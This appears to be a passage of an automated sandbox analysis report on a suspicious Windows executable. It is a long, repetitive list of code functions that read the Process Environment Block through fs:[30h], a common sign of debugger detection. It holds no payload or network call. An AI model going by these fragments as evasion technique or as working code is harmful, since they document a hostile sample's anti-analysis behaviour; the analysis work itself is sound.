                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F63C0 mov eax, dword ptr fs:[00000030h]3_2_019F63C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A63FF mov eax, dword ptr fs:[00000030h]3_2_019A63FF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E3F0 mov eax, dword ptr fs:[00000030h]3_2_0198E3F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E3F0 mov eax, dword ptr fs:[00000030h]3_2_0198E3F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E3F0 mov eax, dword ptr fs:[00000030h]3_2_0198E3F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2C3CD mov eax, dword ptr fs:[00000030h]3_2_01A2C3CD
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019803E9 mov eax, dword ptr fs:[00000030h]3_2_019803E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A143D4 mov eax, dword ptr fs:[00000030h]3_2_01A143D4
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A143D4 mov eax, dword ptr fs:[00000030h]3_2_01A143D4
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E3DB mov eax, dword ptr fs:[00000030h]3_2_01A1E3DB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E3DB mov eax, dword ptr fs:[00000030h]3_2_01A1E3DB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E3DB mov ecx, dword ptr fs:[00000030h]3_2_01A1E3DB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E3DB mov eax, dword ptr fs:[00000030h]3_2_01A1E3DB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A48324 mov eax, dword ptr fs:[00000030h]3_2_01A48324
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A48324 mov ecx, dword ptr fs:[00000030h]3_2_01A48324
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A48324 mov eax, dword ptr fs:[00000030h]3_2_01A48324
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A48324 mov eax, dword ptr fs:[00000030h]3_2_01A48324
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C310 mov ecx, dword ptr fs:[00000030h]3_2_0196C310
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01990310 mov ecx, dword ptr fs:[00000030h]3_2_01990310
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA30B mov eax, dword ptr fs:[00000030h]3_2_019AA30B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA30B mov eax, dword ptr fs:[00000030h]3_2_019AA30B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA30B mov eax, dword ptr fs:[00000030h]3_2_019AA30B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov eax, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov eax, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov eax, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov ecx, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov eax, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F035C mov eax, dword ptr fs:[00000030h]3_2_019F035C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F2349 mov eax, dword ptr fs:[00000030h]3_2_019F2349
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1437C mov eax, dword ptr fs:[00000030h]3_2_01A1437C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A4634F mov eax, dword ptr fs:[00000030h]3_2_01A4634F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A3A352 mov eax, dword ptr fs:[00000030h]3_2_01A3A352
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A18350 mov ecx, dword ptr fs:[00000030h]3_2_01A18350
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov eax, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov ecx, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov eax, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov eax, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov eax, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A062A0 mov eax, dword ptr fs:[00000030h]3_2_01A062A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F0283 mov eax, dword ptr fs:[00000030h]3_2_019F0283
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F0283 mov eax, dword ptr fs:[00000030h]3_2_019F0283
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F0283 mov eax, dword ptr fs:[00000030h]3_2_019F0283
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE284 mov eax, dword ptr fs:[00000030h]3_2_019AE284
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE284 mov eax, dword ptr fs:[00000030h]3_2_019AE284
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019802A0 mov eax, dword ptr fs:[00000030h]3_2_019802A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019802A0 mov eax, dword ptr fs:[00000030h]3_2_019802A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A462D6 mov eax, dword ptr fs:[00000030h]3_2_01A462D6
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019802E1 mov eax, dword ptr fs:[00000030h]3_2_019802E1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019802E1 mov eax, dword ptr fs:[00000030h]3_2_019802E1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019802E1 mov eax, dword ptr fs:[00000030h]3_2_019802E1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196823B mov eax, dword ptr fs:[00000030h]3_2_0196823B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A250 mov eax, dword ptr fs:[00000030h]3_2_0196A250
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976259 mov eax, dword ptr fs:[00000030h]3_2_01976259
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A20274 mov eax, dword ptr fs:[00000030h]3_2_01A20274
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F8243 mov eax, dword ptr fs:[00000030h]3_2_019F8243
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F8243 mov ecx, dword ptr fs:[00000030h]3_2_019F8243
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A250 mov eax, dword ptr fs:[00000030h]3_2_01A2A250
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A250 mov eax, dword ptr fs:[00000030h]3_2_01A2A250
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974260 mov eax, dword ptr fs:[00000030h]3_2_01974260
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974260 mov eax, dword ptr fs:[00000030h]3_2_01974260
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01974260 mov eax, dword ptr fs:[00000030h]3_2_01974260
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A4625D mov eax, dword ptr fs:[00000030h]3_2_01A4625D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196826B mov eax, dword ptr fs:[00000030h]3_2_0196826B
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE59C mov eax, dword ptr fs:[00000030h]3_2_019AE59C
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A4588 mov eax, dword ptr fs:[00000030h]3_2_019A4588
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01972582 mov eax, dword ptr fs:[00000030h]3_2_01972582
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01972582 mov ecx, dword ptr fs:[00000030h]3_2_01972582
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019945B1 mov eax, dword ptr fs:[00000030h]3_2_019945B1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019945B1 mov eax, dword ptr fs:[00000030h]3_2_019945B1
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F05A7 mov eax, dword ptr fs:[00000030h]3_2_019F05A7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F05A7 mov eax, dword ptr fs:[00000030h]3_2_019F05A7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F05A7 mov eax, dword ptr fs:[00000030h]3_2_019F05A7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019765D0 mov eax, dword ptr fs:[00000030h]3_2_019765D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA5D0 mov eax, dword ptr fs:[00000030h]3_2_019AA5D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA5D0 mov eax, dword ptr fs:[00000030h]3_2_019AA5D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE5CF mov eax, dword ptr fs:[00000030h]3_2_019AE5CF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE5CF mov eax, dword ptr fs:[00000030h]3_2_019AE5CF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC5ED mov eax, dword ptr fs:[00000030h]3_2_019AC5ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AC5ED mov eax, dword ptr fs:[00000030h]3_2_019AC5ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019725E0 mov eax, dword ptr fs:[00000030h]3_2_019725E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E5E7 mov eax, dword ptr fs:[00000030h]3_2_0199E5E7
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06500 mov eax, dword ptr fs:[00000030h]3_2_01A06500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44500 mov eax, dword ptr fs:[00000030h]3_2_01A44500
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199E53E mov eax, dword ptr fs:[00000030h]3_2_0199E53E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01980535 mov eax, dword ptr fs:[00000030h]3_2_01980535
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978550 mov eax, dword ptr fs:[00000030h]3_2_01978550
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01978550 mov eax, dword ptr fs:[00000030h]3_2_01978550
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A656A mov eax, dword ptr fs:[00000030h]3_2_019A656A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A44B0 mov ecx, dword ptr fs:[00000030h]3_2_019A44B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FA4B0 mov eax, dword ptr fs:[00000030h]3_2_019FA4B0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A49A mov eax, dword ptr fs:[00000030h]3_2_01A2A49A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019764AB mov eax, dword ptr fs:[00000030h]3_2_019764AB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019704E5 mov ecx, dword ptr fs:[00000030h]3_2_019704E5
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A8402 mov eax, dword ptr fs:[00000030h]3_2_019A8402
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AA430 mov eax, dword ptr fs:[00000030h]3_2_019AA430
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C427 mov eax, dword ptr fs:[00000030h]3_2_0196C427
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E420 mov eax, dword ptr fs:[00000030h]3_2_0196E420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6420 mov eax, dword ptr fs:[00000030h]3_2_019F6420
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199245A mov eax, dword ptr fs:[00000030h]3_2_0199245A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196645D mov eax, dword ptr fs:[00000030h]3_2_0196645D
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019AE443 mov eax, dword ptr fs:[00000030h]3_2_019AE443
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199A470 mov eax, dword ptr fs:[00000030h]3_2_0199A470
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2A456 mov eax, dword ptr fs:[00000030h]3_2_01A2A456
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FC460 mov ecx, dword ptr fs:[00000030h]3_2_019FC460
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A247A0 mov eax, dword ptr fs:[00000030h]3_2_01A247A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1678E mov eax, dword ptr fs:[00000030h]3_2_01A1678E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019707AF mov eax, dword ptr fs:[00000030h]3_2_019707AF
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197C7C0 mov eax, dword ptr fs:[00000030h]3_2_0197C7C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F07C3 mov eax, dword ptr fs:[00000030h]3_2_019F07C3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019747FB mov eax, dword ptr fs:[00000030h]3_2_019747FB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019747FB mov eax, dword ptr fs:[00000030h]3_2_019747FB
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019927ED mov eax, dword ptr fs:[00000030h]3_2_019927ED
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019FE7E1 mov eax, dword ptr fs:[00000030h]3_2_019FE7E1
